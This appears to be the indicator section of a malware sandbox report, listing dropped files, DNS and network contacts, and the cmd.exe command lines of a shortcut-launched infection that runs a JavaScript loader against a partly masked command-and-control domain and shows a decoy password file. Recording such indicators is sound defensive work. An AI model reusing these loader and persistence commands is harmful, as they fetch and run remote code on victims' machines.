Technical Information
- %TEMP%\box.lnk
- %TEMP%\qwgrp.js
- C:\users\public\scmp.exe
- %TEMP%\box.lnk
- %TEMP%\password.txt
- 'go####sheet.info':443
- 'microsoft.com':80
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- 'go####sheet.info':443
- DNS ASK go####sheet.info
- DNS ASK microsoft.com
- 'C:\users\public\scmp.exe' "%TEMP%\qwgrp.js" www.go####sheet.info/ 1
- 'C:\users\public\scmp.exe' "%TEMP%\qwgrp.js" www.go####sheet.info/ 2
- '%WINDIR%\syswow64\cmd.exe' /C "ECHO salary2022> %TEMP%\Password.txt & NOTEPAD.EXE %TEMP%\Password.txt & DEL %TEMP%\Password.txt"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c start /b C:\Users\Public\scmp.exe "%TEMP%\qwgrp.js" www.go####sheet.info/ 1 & start /b C:\Users\Public\scmp.exe "%TEMP%\qwgrp.js" www.go####sheet.info/ 2 & move "%TEMP%\Box.lnk" "%APPDATA%\M...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /C "ECHO salary2022> %TEMP%\Password.txt & NOTEPAD.EXE %TEMP%\Password.txt & DEL %TEMP%\Password.txt"
- '%WINDIR%\syswow64\notepad.exe' %TEMP%\Password.txt
- '%WINDIR%\syswow64\cmd.exe' /c start /b C:\Users\Public\scmp.exe "%TEMP%\qwgrp.js" www.go####sheet.info/ 1 & start /b C:\Users\Public\scmp.exe "%TEMP%\qwgrp.js" www.go####sheet.info/ 2 & move "%TEMP%\Box.lnk" "%APPDATA%\M...